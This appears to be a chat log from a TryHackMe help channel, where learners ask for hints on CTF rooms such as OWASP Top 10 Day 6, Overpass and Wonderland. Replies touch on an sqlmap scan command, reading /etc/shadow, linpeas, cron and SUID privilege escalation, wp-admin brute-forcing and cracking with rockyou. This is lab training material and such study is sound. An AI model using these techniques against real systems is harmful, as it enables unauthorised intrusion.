I finally get it, the other place to search, I see why you said the hint about indexing now...

@odd panther does that allow to prevent indexing from web searches?

@frank lagoon I dont think its that

No

Google just doesn't index everything

This ^^

no cigar

for you

What's a common website used to share source code for open source projects?

I'll keep giving out this hint

Webserver hosts it?

No

Bitbucket?

What's a common website used to share source code for open source projects?
@stuck fractal Literally this is all you need

Bitbucket?
@marble moat that still a thing?

😭😭

Thanks @stuck fractal for the hint -- fully agreed with what you said -- it's literally the only hint that's needed... 🙂

@stuck fractal Literally this is all you need
You can even put it like this into google 🤣

You need more than just google

But yeah

I can learn from that, thank you. Its in golang!

I meant your hint/question 😛

Common website for source code for projects

To download?

To share.

Does the domainname start with 'opensource'?

@frank lagoon You're not gonna bruteforce-ask the domain name now are you? 🤣

Hahaha

Lol, google doesn't help

Something to do with mit license?

This is pain, I want to help you so bad but can't.. hammers etc haha

your all so close to 😦

Thanks for the hint @stuck fractal

This is pain, I want to help you so bad but can't.. hammers etc haha
@odd panther tried etc/shadow 😭😭😭

|| Sourceforge? ||

/etc/shadow never works for me ( i mean not been a good priv esc as usually locked down)

I'm sure there are ways tho

Open source repo

tried etc/shadow 😭😭😭
@marble moat Seriously, try some privesc enumeration scripts

Or check the room tags and the checklist I keep linking

|| SourceRepo? ||

You're thinking of tiny things

Think bigger

Can you give another hint?

No

I've given plenty of hints

You try every answer posted here

Might find it

https://en.wikipedia.org/wiki/Comparison_of_source-code-hosting_facilities have fun

James any hint on This - #room-help message

Wait for a response

Ok

https://en.wikipedia.org/wiki/Comparison_of_source-code-hosting_facilities have fun
@white salmon James just listed quite a lot

@white salmon James just listed quite a lot
@tall rover just seen 👍

Source code hosting? || Assembla || If that was incorrect then I will try everything on that list (litle bruteforce)

You need to put the work in yourself

You've used it before

I will complete it later

@frank lagoon it is most likely the first place that comes to mind when talking bout opensource projects

|| Github, gitlab, sourceforge ||

Have a look around maybe¯_(ツ)_/¯

Thanks, I think I got it

@frank lagoon Maybe try searching on those platforms

Google doesn't index everything

I got it

Maybe

lol bout time 🙂

Have been smashing my head on my desk your so close haha

Okay I see salt values?? am I on tight track?@odd panther

no

Read the documentation

Always read the documentation

Ohhhh

Goddddddd

Dumb

Me

@stuck fractal thanks for pushing my brain man

Got it

This was designed to be easy

Just people overcomplicate it

I did overcomplicate it a lot.

@stuck fractal I was slightly disappointed that you properly escaped all your SQL for Pensive Notes. I was hoping to find some Easter eggs. Of course, there is a good chance there were things to find and I’m just not bright enough to find anything. 😀

@stuck fractal yesss it was easy, guess had a lot of red herring

Its one of those tho, when searching and not knowing you try all and give up fast even when on the right track. I'm leaning now to keep going even after hours of enum, you WILL get it at some point.

@toxic scarab There's nothing interesting on the DB

I just learnt with prepared statements, I don't know how to do it in a vulnerable way yet

btw google indexed it just you have to remove the space

Oh interesting, it indexed it because of my readme

nice

Thanks for the help guys finally found it. You were right James, it was easy just overthought alot of it.

For sure a learning moment

omg got root on overpass

Am I on the right path? I found a main.go file

You need to read the docs

It's not got a hardcoded password

Hardcoded and default are slightly different

Hardcoded cannot be changed

Thanks ninja

I think I found it

where are these documents

@frank lagoon not yet i guess

The internet

he we go again xD

haha

@sterile robin Do your research and enumeration and you will find them

what web site

Google works

Keep trying

@rapid flower I found it

What's a common website used to share source code for open source projects?

That's the hint

@frank lagoon you are talking about owasp or overpass?

Don't spoil the room.

@rapid flower OWASP

Ninja, the reason why it took so long to find it is because I didn't look.

Owasp

Exactly

I didn't mean it sorry

If you look, you will find it

Ohh my bad... I misunderstood

But you have to look yourself

I know, alot of people maybe misunderstood me and told me to look somewhere else then that platform

found it😂 😂 🤦‍♂️

same just, I can't believe i missed the comment "check the documentation"

I so almost pasted the key here too.. lucky lol

must have better window arrangement

Some hint for privesc on overpass... Ran ||linpeas|| but nit able to figure out next step

Look at your results

Look at what you can control

Look at the room tags

Pentesting=Everything is hard until you know how. I spend so many hours on a task but when i get it, ahh its good. (usually simple too, after you know how), this sums up learning for me so far haha

i'm looking for a hint or a push in the right direction for Task 18 SQL Injection of room CC:Pen Testing

i've ran sqlmap -u "http://{ip}/?id=1" --level=5 --risk=3

but I can't seem to get any useful information, it just shows testing info, and at the end it says all tested parameters do not appear to be injectable

my first question is to answer how many sqli vulnerabilities there are, but from the output i'm getting it seems like none, lol

There's no parameter called id.

doesn't sqlmap require there to be a parameter?

Yes

But it's not id

ohhhhh i think i know how to get it

is it the id located in the page source?

nevermind, looks like i can just run it with --forms

You typically look at a request to find the parameter

Or see what the form is going to do

ohhh, okay, that makes sense

@odd panther hii bro can i pm you about overpass ?

the owasp challenge for today hint is to locate the app source code, i am not sure how to find out what this app is , i tried googling for 'pensive notes' and no results on github. Enumerated via dirb / nitko but no luck either. Any direction ? also tried a bunch of user/pw combos but not luck.

Google without a space

But it's available quite easily

Google doesn't index everything

A website's own search feature will be better for results on that site

10-4 , that took all of 5 minutes, now taking my beginner level skills to Overpass and all the rabbits hole i have dug for myself

How can I get output file on the remote host in meterpreter ? Any idea .

That sounds like a question for google.

There's a nice meterpreter basics article out there

I recommend finding and reading it

I checked .it .but I can't find ...
Ok .maybe I will give through reading..

@stuck fractal searched everything ...I found command download ...but my answer need to be in 3 letter .like this can u give me hint

Room wonderland, I was user rabbit, teaParty binary is owned by root. I did ||enviroment variable privilege escalation ||on this binary by creating a fake date binary but I got hatter as user and not root?

You can't possibly have searched everything. @ivory kernel

@white salmon time for you to learn about suid and some RE

Have you looked at the source code of the binary?

I did strings only

Didn't re

Eh, do some RE

Look at the system calls

Oh I'll try

That explains why

@stuck fractal if this one is over .whole machine is over .jus stucked here .😅😅

Or you can accept that I added a setuid(100Whatever) at the start of the program @white salmon

And that you can't get root from it

yes/no on overpass rabbit hole i m stuck in- is there sql injection on the admin form ? cause my sqlmap is not finidng any

@ivory kernel I told you to go find the meterpreter basics. It's in there. Please remember rule 13. This is very easy to find via google.

@waxen iron No, it uses prepared statements so there's no possible SQLi.

Yeah I added setuid(0). I'll read more about suid I think I need to get more clarity in it.

It's already running as a different user

You can't change that

You managed to go one user up the chain

That's a good thing. Now keep going.

thanks @stuck fractal btw - for patiently answering everyones questions here.

I made the room, so I can answer that question quickly

I also made wonderland, so that's quick to answer

I'm slowly taking over the platform and there's nothing you can do to stop me muhahaha

@stuck fractal I searched it man ...
I got answer ...
One is download .and another one is spool .
But it's states that 3 letter word can fit in .? .

Hey guys I need help with owasp top 10 room latest challenge. Can you give me any hint on security misconfiguration.

So finally rooted overpass. Thanks for the box @stuck fractal

@ivory kernel https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

Try. Harder.

Lol yes yes

I told you that this guide exists, and asked you to find it yourself and look at it.

Man I fully went through that document I couldn't find answer 😭😭😭😭 .
Can u pls say answer or otherwise show answer in that site @stuck fractal I'm sure I didn't missed anything .

It's in there.

We do not give answers

Do your own research.

i too struck on that bro @ivory kernel

Any hint on Day 6, room owasptop10, find comment and try how fetch is working here for JSON
Atleast tell me, am I going wrong

@marble kiln Read the material in the room, check the hint

You're not going to be able to hack in unless you know credentials

Any hints related ||cron|| in overpass?

Work out what you can control and what you can't control

@stuck fractal reading source code from hours but couldn't see any credentials except a comment in js fiel🥺😅

It's not in JS

So have fun

The source code isn't the frontend code

Try harder. Do some research.

Overpass is not beginner level... Or is it?

It is.

Upper end of beginner

It's not expected to be your first box

Then I surely need to go a long way

You're expected to know privesc and enumeration

Run some privesc enumeration scripts

And it's my first... Atleast where things are relted to ||cron||

Ok, so time for you to do some research into that

||gtfobins|| don't appear to be working over here

Copy/paste from GTFOBins is boring

You have to actually understand what's going on.

Yup... Looking for ||cron|| privesc methids

You won't get it until you actually understand what's going on

Ohkayyy

for jack do we have to bruteforce the wp-admin

😅

@green sorrel try it and find out

I am

If it takes more than 5 minutes, then either wrong user or you're not meant to

still stuck on overpass foothold. I try force to go somewhere. but it is a little tricky because I don't know where I actually want/can go. so I guess I'm again on the wrong path

@marble dagger dm me for help

@marble dagger dm me for help
@cedar coral can i dm you for help?

Yes

Anyone done with the Day 6 of OWASP room (Beginner)? I'm stuck there. I took the hint that I should go through the web app source code... It says maybe the documentation will mention default credentials.... I couldn't find any documentation. I went through all the html pages and it's .js scripts. The closest I've got to in the default values in main.js? Hint?

You are looking at the frontend. Not the source code

@white salmon so you mean to say it's not 'View Page Source' or curl?

@white salmon so you mean to say it's not 'View Page Source' or curl?
@autumn rivet Yeah its not that.

@autumn rivet Yeah its not that.
@white salmon Yes its actually not

Try to find the documentation for the code online. @autumn rivet

i need help with https://tryhackme.com/room/rpmetasploit ~ task 5 ~ #12

any hint on latest release of owasp top 10? security misconfiguration?

Checked all the source codes of the html pages, examined js files. Hint says to look in source code but there is nothing interesting there

even checked source code of ip/mynotes which is not accessible through browser

any hint on latest release of owasp top 10? security misconfiguration?
@dense saddle Its not in the actual code but you have to check if the documentation exists for that code anywhere online. DM me if you need any further hints.

Ok Sundeep thanks

hi

on the overpass box, ||which software to use for authentication bypass||

@little idol what exactly you are trying to bypass?

@little idol Developer tools

@rancid crystal web site access on /admin

@fast swan i'm going to try

Source code gives you the best hints

Any hint to get root on overpass?
I feel stuck.

@valid bough did you try linpeas?

on the overpass box, ||which software to use for authentication bypass||
@little idol I used burp, you can use anything

i searched for source code and documentation
for Security Misconfiguration challenge of OWASP 10 i just found Go-IPFS and InfluxDB Code On Github but i didnt found any thing in docs

Help me on Owasp top 10 challenge 6. I found the ||database file and the password hash but not able to crack it||

you mean day 6? There only need to read the docs

guys I'm just stucked at the overpass room I know that there is || a broken auth || but can't deal with it if some one could give me a nice hint it will be helpful ! ❤️

@vernal goblet|| you have to go on github||

I found the ||GitHub page and got a database file with a password hash in it||

I found the ||GitHub page and got a database file with a password hash in it||
@vernal goblet It's way easier

Maybe the documentation gives you default credentials that you can try.

Look for default creds

Found it! I'm so dumb 😶

Thanks @final mortar

@final mortar ?

guys how would you privesc if you connected to a box via ssh rsa (and dont have any passwords so I cant sudo -l to find any NOPASSWD)

Just read the github page and you see creds are lying around

@worn yew go-ifps-api github page?

I'm referring to owasp 10 day 6 task

@worn yew me too... I can't find github page for pensive note taking app...

there is also a plugin called || cookie editor|| you can use that too if you are lazy to turn on burp

It is there

@worn yew don't share answers

ok

find a way with cookies editor

for ||overpass||

@worn yew me too... I can't find github page for pensive note taking app...
@hardy quest a little search can help you

@worn yew If it may help to find it at first try, play with spaces

i got root OverPass 🙂

@north moat Me too - 'grats (my root was about 2 mins after user - which took me hours to foothold... duh)

i got root OverPass 🙂
@north moat any hints?

yeh root Less time than user.txt 🙂

@worn yew me too... I can't find github page for pensive note taking app...
@hardy quest you may want to use ||github's search|| rather then ||google's||

@random thunder - if overpass was any more spelt out than it was already ^^above^^ - it would be a walkthru 🙂

@keen willow thanks bro! After your hint I directly found it 😁✌🏻

can i get a hint about overpass ?

just use the search bar

u'll find heaps

i got root OverPass 🙂
@north moat I mean it's an easy rated room after all

@final mortar is it easy ?

root overpass just now !!!!

good job 🙂

@little idol hii bro can i pm you about overpass ?

@sick sun you can scroll up till today's msgs, there are a lot of hints for overpass.

hi guys, rockyou will work to crack overpass key

yes

Thanks for the hints @worn yew , @final mortar , @vernal goblet ,
It helped me alot!
I have a question though,
How'd you figure out that you had to go to some Github page?

Where else would you go?

Some googling will take you to that page

The hint tells you to find the source code

Where else would you go?
@stuck fractal Whaoh! that's your github repo right? Awesome!

The hint tells you to find the source code
@stuck fractal I was of the view that I'd try looking at inspect element to find something

That's not the sourcecode for the webapp

That's not the sourcecode for the webapp
@stuck fractal okay, okay
Got it

Sorry, beginner's mistake

Thanks alot though!
Really appreciate your web app

Don't use it in production

@stuck fractal okay, okay
Got it
@jade rampart can you give some hints been looking for about one and half hour

I have

Many many many hints

On the task text, and in here

hi guys, rockyou will work to crack overpass key
@crisp wigeon On tryhackme, you use rockyou unless you're told to use something else.

@stuck fractal thanks then i have some problem...

Probably.

Shall i DM ?

No

You shall not.

Okay ..

just ask your question here @crisp wigeon, that's what the channel is for. If you're afraid that you have spoliers then just surround them in || marks